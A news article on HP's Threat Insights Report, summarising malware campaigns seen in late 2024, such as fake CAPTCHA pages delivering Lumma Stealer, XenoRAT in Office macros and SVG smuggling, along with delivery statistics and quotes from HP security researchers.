At its Amplify Conference today, HP Inc. unveiled its latest HP Threat Insights Report, revealing how attackers are increasingly exploiting everyday security measures—like CAPTCHA verification—to infect devices with malware.

According to the report shared with the Byteline, data from millions of endpoints running HP Wolf Security between October and December 2024, details a rise in cyberattacks that capitalize on what the company calls “click tolerance”—users’ growing habit of quickly complying with multi-step authentication processes online.

One alarming trend identified is the use of fake CAPTCHAs as a gateway for malware infections. In a campaign dubbed “CAPTCHA Me If You Can”, attackers tricked users into completing bogus CAPTCHA tests hosted on malicious websites. 

Believing they were verifying their identity, victims unknowingly executed a PowerShell command that downloaded Lumma Stealer, a remote access trojan (RAT) capable of siphoning off sensitive data.

Another attack vector observed by HP’s researchers involved the spread of XenoRAT, an open-source RAT that gives attackers access to a user’s webcam and microphone. In this campaign, attackers used social engineering tactics—embedding malicious macros in Word and Excel files—to lure users into granting control over their devices.

HP also warned of a sophisticated technique known as SVG smuggling, where attackers embed malicious JavaScript into SVG image files. Since these images are automatically opened in web browsers, the malicious code runs without raising suspicion. 

In one instance, seven different payloads—including info stealers and additional RATs—were deployed through this method. The attackers further leveraged obfuscated Python scripts in the infection chain, a tactic made more effective due to Python's widespread use and presence on many machines, especially with the rise of AI and data science.

“A common thread across these campaigns is the use of obfuscation and anti-analysis techniques to slow down investigations,” said Patrick Schläpfer, Principal Threat Researcher at HP Security Lab. “Simple, effective evasion methods can give attackers a crucial time advantage, making intrusions harder to detect and contain.”

The report also found that at least 11% of email threats detected by HP’s Sure Click feature had bypassed one or more standard email gateway scanners. Executables accounted for 43% of malware deliveries, followed by 32% via archive files.

Dr. Ian Pratt, Global Head of Security for Personal Systems at HP, emphasized the growing risk as cyberattacks evolve alongside user behavior. “Multi-step authentication has become normal, but it’s also increasing our tolerance for clicking through complex processes without thinking. Cyber awareness training is no longer enough.” 

“Organizations need to shrink the attack surface by isolating risky actions—so they don’t have to guess what the next threat will be.”

As attackers continue to experiment with new techniques to bypass conventional defenses, HP’s findings serve as a stark reminder that even the most familiar online experiences can be weaponized.